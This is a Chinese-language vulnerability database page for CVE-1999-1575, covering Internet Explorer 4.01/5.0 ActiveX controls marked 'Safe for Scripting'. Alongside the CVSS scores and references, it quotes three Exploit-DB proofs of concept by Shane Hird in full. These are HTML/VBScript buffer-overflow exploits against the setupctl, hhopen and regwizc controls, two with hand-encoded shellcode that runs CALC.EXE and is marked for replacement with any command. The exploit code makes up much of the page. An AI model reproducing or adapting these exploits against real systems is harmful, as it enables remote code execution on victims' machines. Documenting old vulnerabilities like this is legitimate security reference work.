CVE-1999-1575
CVSS5.1
发布时间 :1999-09-10 00:00:00
修订时间 :2008-09-05 16:19:51
NMCOE    

[原文]The Kodak/Wang (1) Image Edit (imgedit.ocx), (2) Image Annotation (imgedit.ocx), (3) Image Scan (imgscan.ocx), (4) Thumbnail Image (imgthumb.ocx), (5) Image Admin (imgadmin.ocx), (6) HHOpen (hhopen.ocx), (7) Registration Wizard (regwizc.dll), and (8) IE Active Setup (setupctl.dll) ActiveX controls for Internet Explorer (IE) 4.01 and 5.0 are marked as "Safe for Scripting," which allows remote attackers to create and modify files and execute arbitrary commands.


[CNNVD]Kodak/Wang漏洞(CNNVD-199909-020)

        Kodak/Wang(1)影像编辑(imgedit.ocx),(2)影像注解(imgedit.ocx),(3)影像扫描(imgscan.ocx),(4)缩略图(imgthumb.ocx),(5)图像管理(imgadmin.ocx),(6)HHOpen (hhopen.ocx),(7)注册向导(regwizc.dll),以及(8)Internet Explorer (IE) 4.01和5.0版本上的IE Active Setup(setupctl.dll) ActiveX控件被标记为“Safe for Scripting,”。远程攻击者可以创建和修改文件以及执行任意命令。

- CVSS (基础分值)

CVSS分值: 5.1 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:microsoft:ie:5.0Microsoft Internet Explorer 5.0
cpe:/a:microsoft:ie:4.0.1Microsoft Internet Explorer 4.0.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1575
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-1575
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199909-020
(官方数据源) CNNVD

- 其它链接及资源

http://www.kb.cert.org/vuls/id/9162
(UNKNOWN)  CERT-VN  VU#9162
http://www.kb.cert.org/vuls/id/41408
(UNKNOWN)  CERT-VN  VU#41408
http://www.kb.cert.org/vuls/id/26924
(UNKNOWN)  CERT-VN  VU#26924
http://www.kb.cert.org/vuls/id/24839
(UNKNOWN)  CERT-VN  VU#24839
http://www.kb.cert.org/vuls/id/23412
(UNKNOWN)  CERT-VN  VU#23412
http://xforce.iss.net/xforce/xfdb/7097
(UNKNOWN)  XF  wang-kodak-activex-control(7097)
http://www.securityfocus.com/archive/1/28719
(UNKNOWN)  BUGTRAQ  19990924 Several ActiveX Buffer Overruns
http://www.microsoft.com/technet/security/bulletin/ms99-037.mspx
(UNKNOWN)  MS  MS99-037

- 漏洞信息

Kodak/Wang漏洞
中危 未知
1999-09-10 00:00:00 2005-10-20 00:00:00
远程  
        Kodak/Wang(1)影像编辑(imgedit.ocx),(2)影像注解(imgedit.ocx),(3)影像扫描(imgscan.ocx),(4)缩略图(imgthumb.ocx),(5)图像管理(imgadmin.ocx),(6)HHOpen (hhopen.ocx),(7)注册向导(regwizc.dll),以及(8)Internet Explorer (IE) 4.01和5.0版本上的IE Active Setup(setupctl.dll) ActiveX控件被标记为“Safe for Scripting,”。远程攻击者可以创建和修改文件以及执行任意命令。

- 公告与补丁

        

- 漏洞信息 (19515)

MS IE 4.0 for Windows 95/Windows NT 4 Setupctl ActiveX Control Buffer Overflow (EDBID:19515)
windows remote
1999-09-27 Verified
0 Shane Hird
N/A [点击下载]
Microsoft Internet Explorer 4.0 for Windows 95/Windows NT 4 Setupctl ActiveX Control Buffer Overflow

source: http://www.securityfocus.com/bid/667/info

There is a buffer overflow in the setupctl ActiveX control that used to ship with some versions of Microsoft's Internet Explorer. This ActiveX control is used to link to an update site at Microsoft and is marked 'Safe for Scripting' . Arbitrary commands may be executed if the ActiveX control is run in a malicious manner. 

SETUPCTL

Apparently a control that was once used for the IE update 
web site which is no longer in use, although it should 
still exist on a lot of systems. With this exploit, similar 
to the PDF exploit, ESP points to our code so we simply RET 
to the same JMP ESP in Shell32. Also, this exploit differs 
in that we set a property first (DistUnit) with the long 
string, then call the method (InstallNow). Again, I have 
simply demonstrated how to execute CALC.EXE, though any 
code can be executed.


<object classid="clsid:F72A7B0E-0DD8-11D1-BD6E-
00AA00B92AF1" id = "setupctl">
</object>

<script language="vbscript"><!--

msgbox("Setupctl 1.0 Type Library Buffer Overrun" + Chr(10) 
+ "Written by Shane Hird")

expstr="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAA"

expstr = expstr + Chr(235)	'Address in SHELL32, Win98 
(7FD035EB) of JMP ESP
expstr = expstr + Chr(53)	'You may need to use a 
different address
expstr = expstr + Chr(208)
expstr = expstr + Chr(127)

'NOP for debugging purposes
expstr = expstr + Chr(144)

'MOV EDI, ESP
expstr = expstr + Chr(139) + Chr(252)

'ADD EDI, 19h (Size of code)
expstr = expstr + Chr(131) + Chr(199) + Chr(25)

'PUSH EAX (Window Style EAX = 41414141)
expstr = expstr + Chr(80)

'PUSH EDI (Address of command line)
expstr = expstr + Chr(87)

'MOV EDX, BFFA0960 (WinExec, Win98)
expstr = expstr + Chr(186) + Chr(96) + Chr(9) + Chr(250) + 
Chr(191)

'CALL EDX
expstr = expstr + Chr(255) + Chr(210)

'XOR EAX, EAX
expstr = expstr + Chr(51) + Chr(192)

'PUSH EAX
expstr = expstr + Chr(80)

'MOV EDX, BFF8D4CA (ExitProcess, Win98)
expstr = expstr + Chr(186) + Chr(202) + Chr(212) + Chr(248) 
+ Chr(191)

'CALL EDX
expstr = expstr + Chr(255) + Chr(210)

'Replace with any command + 0 (automatically appended)
expstr = expstr + "CALC.EXE"

'Run exploit
setupctl.DistUnit = expstr
setupctl.InstallNow

--></script>
		

- 漏洞信息 (19521)

MS IE 5.0/4.0.1 hhopen OLE Control Buffer Overflow Vulnerability (EDBID:19521)
windows remote
1999-09-27 Verified
0 Shane Hird
N/A [点击下载]
Microsoft Internet Explorer 5.0 for Windows 2000/Windows 95/Windows 98/Windows NT 4/Internet Explorer 4.0.1 for Windows 98/Windows NT 4.0 hhopen OLE Control Buffer Overflow Vulnerability

source: http://www.securityfocus.com/bid/669/info

There is a buffer overflow in the 1.0.0.1 version of the hhopen OLE control (hhopen.ocx) that ships with some versions of Internet Explorer. This control is marked 'Safe for Scripting' . Arbitrary commands may be executed if the OLE control is run in a malicious manner. 

HHOPEN:

This control is a little more difficult to exploit, as the 
RET address is in the middle of the string, and once again 
there is no easy way to RET to our code, so I have RET'd to 
ExitProcess directly instead. In this case, OpenHelp is the 
vulnerable method, and the exploit is possible when the 
method is called with a valid help file, and a long Help 
Section.

<object
   classid="clsid:130D7743-5F5A-11D1-B676-00A0C9697233"
 id="hhopen"></OBJECT>

<script language="vbscript"><!--

msgbox("hhopen OLE Control Module Buffer Overrun" + Chr(10) 
+ "Written By Shane Hird")

expstr="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

'Where the RET address appears to be, RET to ExitProcess 
(BFF8D4CA)
expstr = expstr + Chr(202) + Chr(212) + Chr(248) + Chr(191)

'Extra padding to trigger the overrun
expstr = expstr 
+ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAA"

'Call exploitable method, note the valid help file
hhopen.OpenHelp "Winhlp32.hlp", expstr

--></script>

		

- 漏洞信息 (19528)

MS IE 4.1/5.0 Registration Wizard Buffer Overflow (EDBID:19528)
windows local
1999-09-27 Verified
0 Shane Hird
N/A [点击下载]
Microsoft Internet Explorer 4.1/5.0 for Windows 95/Windows NT 4,Windows 98 Registration Wizard Buffer Overflow Vulnerability

source: http://www.securityfocus.com/bid/671/info


There is a buffer overflow in the Internet Explorer Registration Wizard control (regwizc.dll). This control is marked 'Safe for Scripting' . Arbitrary commands may be executed if the control is run in a malicious manner. 

REGWIZC

The Registration Wizard control used by Microsoft to 
register MS products also contains a buffer overrun in 
the 'InvokeRegWizard' method. When called with a long 
string, pre-pended with '/i', we can gain control of the 
RET address and exploit the control in a similar manner as 
the PDF control. This exploit will cause a 'Regwiz.log' 
file to be created in the temporary directory, and once 
again will execute CALC.EXE and terminate the host.

<object classid="clsid:50E5E3D1-C07E-11D0-B9FD-
00A0249F6B00" id="RegWizObj">
</object>

<script language="VbScript" ><!--

msgbox("Registration Wizard Buffer Overrun" + Chr(10) 
+ "Written by Shane Hird")

expstr = "/i 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

'We overflowed to the RET point of the stack
'No NULL's allowed so ret to <JMP ESP> in Shell32

expstr = expstr & Chr(235)	'Address in SHELL32, Win98 
(7FD035EB) of JMP ESP
expstr = expstr & Chr(53)	'You may need to use a 
different address
expstr = expstr & Chr(208)
expstr = expstr & Chr(127)


'NOP for debugging purposes
expstr = expstr + Chr(144)

'MOV EDI, ESP
expstr = expstr + Chr(139) + Chr(252)

'ADD EDI, 19 (Size of code)
expstr = expstr + Chr(131) + Chr(199) + Chr(25)

'PUSH EAX (Window Style EAX = 41414141)
expstr = expstr + Chr(80)

'PUSH EDI (Address of command line)
expstr = expstr + Chr(87)

'MOV EDX, BFFA0960 (WinExec, Win98)
expstr = expstr + Chr(186) + Chr(96) + Chr(9) + Chr(250) + 
Chr(191)

'CALL EDX
expstr = expstr + Chr(255) + Chr(210)

'XOR EAX, EAX
expstr = expstr + Chr(51) + Chr(192)

'PUSH EAX
expstr = expstr + Chr(80)

'MOV EDX, BFF8D4CA (ExitProcess, Win98)
expstr = expstr + Chr(186) + Chr(202) + Chr(212) + Chr(248) 
+ Chr(191)

'CALL EDX
expstr = expstr + Chr(255) + Chr(210)

'Replace with any command + 0 (automatically appended)
expstr = expstr + "CALC.EXE"

RegWizObj.InvokeRegWizard(expstr)

--></script>
		

- 漏洞信息

18537
Kodak/Wang Image Edit (imgedit.ocx) ActiveX for MSIE Permission Weakness
Remote / Network Access, Context Dependent Input Manipulation

- 漏洞描述

Unknown or Incomplete

- 时间线

1999-09-24 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站